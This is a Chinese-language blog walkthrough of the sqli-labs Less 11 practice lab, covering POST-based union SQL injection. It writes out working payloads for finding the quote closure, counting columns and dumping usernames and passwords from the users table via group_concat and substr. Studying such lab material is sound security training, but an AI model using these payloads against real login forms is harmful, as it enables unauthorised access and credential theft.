sqli-labs靶场 less 11

文章目录


sqli-labs靶场

每道题都从以下模板讲解,并且每个步骤都有图片,清晰明了,便于复盘。

sql注入的基本步骤

  • 注入点
  • 注入类型
    • 字符型:判断闭合方式 ('、"、''、"")
    • 数字型
  • 根据实际情况,选择合适的注入方式
  • 获取数据库名,表名,列名,数据

less 11 POS联合注入

  • 题目类型:

细节:

Post输入框中,--+注释符不起作用,#注释符可以用

判断闭合方式

输入uname= a' 提示报错 ''1'' and password='' LIMIT 0,1'

根据报错得到,and连接用户名和密码

uname=1'--+ 没有提示报错,说明闭合成功,所以闭合方式是单引号

判断列数

uname=1'order+by+3--+

uname=1'order+by+2--+

无报错,说明该页面sql语句查询返回的字段数是二列

uname=1'union+select+1,2--+

联合注入报数据

uname=1'union+select+1,(select+substr((group_concat(username,password)),1,32)+from+users)--+

通过substr截取出全部数据

相关推荐
EndingCoder2 分钟前
函数基础:参数和返回类型
linux·前端·ubuntu·typescript
码客前端8 分钟前
理解 Flex 布局中的 flex:1 与 min-width: 0 问题
前端·css·css3
Komorebi゛8 分钟前
【CSS】圆锥渐变流光效果边框样式实现
前端·css
工藤学编程21 分钟前
零基础学AI大模型之CoT思维链和ReAct推理行动
前端·人工智能·react.js
徐同保21 分钟前
上传文件,在前端用 pdf.js 提取 上传的pdf文件中的图片
前端·javascript·pdf
怕浪猫22 分钟前
React从入门到出门第四章 组件通讯与全局状态管理
前端·javascript·react.js
欧阳天风30 分钟前
用setTimeout代替setInterval
开发语言·前端·javascript
EndingCoder34 分钟前
箭头函数和 this 绑定
linux·前端·javascript·typescript
郑州光合科技余经理34 分钟前
架构解析:同城本地生活服务o2o平台海外版
大数据·开发语言·前端·人工智能·架构·php·生活
沐墨染36 分钟前
大型数据分析组件前端实践:多维度检索与实时交互设计
前端·elementui·数据挖掘·数据分析·vue·交互